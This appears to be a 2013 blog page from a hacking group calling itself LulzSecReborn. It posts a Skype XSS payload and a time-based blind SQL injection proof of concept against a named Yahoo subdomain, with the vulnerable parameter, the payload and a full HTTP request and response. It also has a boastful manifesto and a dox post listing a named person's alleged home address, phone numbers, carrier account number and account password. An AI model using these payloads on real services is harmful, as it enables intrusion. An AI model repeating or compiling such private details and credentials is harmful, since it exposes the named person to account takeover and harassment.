Tuesday, April 30, 2013

Skype XSS flaw #LulzVulnerabilities



Skype XSS

Spell check+Replace with "><img src=x onerror=alert('x') />

Friday, April 26, 2013

Yahoo! Blind SQL Injection #LulzVulnerabilities


The time-based sql injection web vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. For demonstration or reproduce...

Vulnerable Service Domain:        tw.ysm.emarketing.yahoo.com
Vulnerable Module:            soeasy
Vulnerable File:            index.php
Vulnerable Parameters:            ?p=2&scId=

POC:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--

Payload:
1; union select SLEEP(5)--

Request:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)--


GET /soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)-- HTTP/1.1
Host: tw.ysm.emarketing.yahoo.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: is_c=1; device=pc; showNews=Y; B=9tgpb118xilu04&b=3&s=mu; AO=o=1&s=1&dnt=1; tw_ysm_soeasy=d%3D351d9185185129780476f856.
17880929%26s%3DxLxK2mb96diFbErWUyv_jGQ--; __utma=266114698.145757337399.1361672202.1361672202.1361672202.1; __utmb=2663114698.
1.10.1361672202; __utmc=2636114698; __utmz=266114698.13616732202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
DNT: 1
Connection: keep-alive

HTTP/1.0 200 OK
Date: Sun, 24 Feb 2013 02:16:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi
SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip

Wednesday, April 24, 2013

Introducing Lulz Security Reborn!


IF YOU COME TO OUR WEBSITE WE'LL TURN YOUR COMPUTER INTO A BOMB!!!!11111!111!!!!!

Hello, good day, and how are you? Splendid! We're LulzSecReborn, a small team of lulzy individuals who feel the drabness of the cyber community is a burden on what matters: fun. Considering fun is now restricted to Friday, where we look forward to the weekend, weekend, we have now taken it upon ourselves to spread fun, fun, fun, throughout the entire calender year.

Sing along!

Lulz, exciting and new,
come aboard, we're expecting you.

Lulz, life's sweetest reward,
let it flow, it floats back to you.

The Lulz Boat soon will be making another run
The Lulz Boat promises something for everyone.

Set a course for adventure,
your mind on a new romance.

Lulz won't hurt anymore,
it's an open smile on a friendly shore.

Yes LULZ! Welcome aboard: it's LULZ!

Friday, April 12, 2013

Hey Kevin Mitnick! Problems? #d0x #ForTehLulz


Cingular/AT&T Account

Account Name: Kevin Mitnick
Address: 7113 W Gowan RD
City: Las Vegas
State: NV
Zip: 89129
Landline: 1-805-342-4555
Cell: 1-805-341-4555
Password: 30281719
Last Four: 5695
Acct Number: 570939147
Email: mitnick@gmail.com
AIM's: kevinmitnick66, mitnick007